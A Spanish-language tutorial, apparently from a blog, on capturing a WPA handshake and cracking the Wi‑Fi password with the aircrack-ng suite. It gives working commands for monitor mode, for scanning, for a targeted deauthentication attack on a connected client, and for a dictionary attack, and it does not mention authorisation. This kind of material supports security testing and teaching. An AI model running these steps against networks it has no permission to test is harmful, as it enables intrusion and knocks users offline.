Lo primero será instalar aircrack-ng:
Y ahora es necesario activar el modo monitor en nuestra interfaz de red, fijándonos en el nombre de la interfaz wifi:
Ahora ejecutamos este comando para convertir la antena wifi en modo monitor:
airmon-ng start wlp1s0
Y ahora si ejecutamos un ifconfig veremos como la interfaz wifi ha cambiado:
Y ahora haremos un escaneo de las redes disponibles con este comando:
airodump-ng wlp1s0mon
Vamos a elegir el wifi llamado Red:
Y ahora con su BSSID vamos a listar los devices que están conectados a esta red:
airodump-ng -c 1 --bssid 2C:99:24:69:4F:D9 -w captura wlp1s0mon
Y ahora es cuando tenemos que obtener el handshake; y para ello tenemos que generar tráfico al mismo tiempo, por lo que desde otra ventana vamos a generar tráfico:
# Con el -a cogemos el nombre del BSSID y con -c cogemos la estación. aireplay-ng -0 9 -a 2C:99:24:69:4F:D9 -c 3E:AF:E4:72:E6:A0 wlp1s0mon
Y una vez lanzado esto, ya tenemos el handshake:
Ahora veremos que tenemos una serie de archivos en el actual directorio, que los usaremos más adelante:
Una vez tenemos esto, solo necesitamos ejecutar este otro comando pasándole el handshake, seleccionando el fichero cap y un diccionario:
aircrack-ng -b 2C:99:24:69:4F:D9 -w diccionario.txt captura-02.cap
Y vemos que nos encuentra la contraseña gracias a que se encontraba dentro del diccionario:
Por último, para restablecer nuestra antena y quitar el modo monitor, lo haríamos de la siguiente forma:
sudo airmon-ng stop wlan0 # O el nombre de la interfaz que corresponda.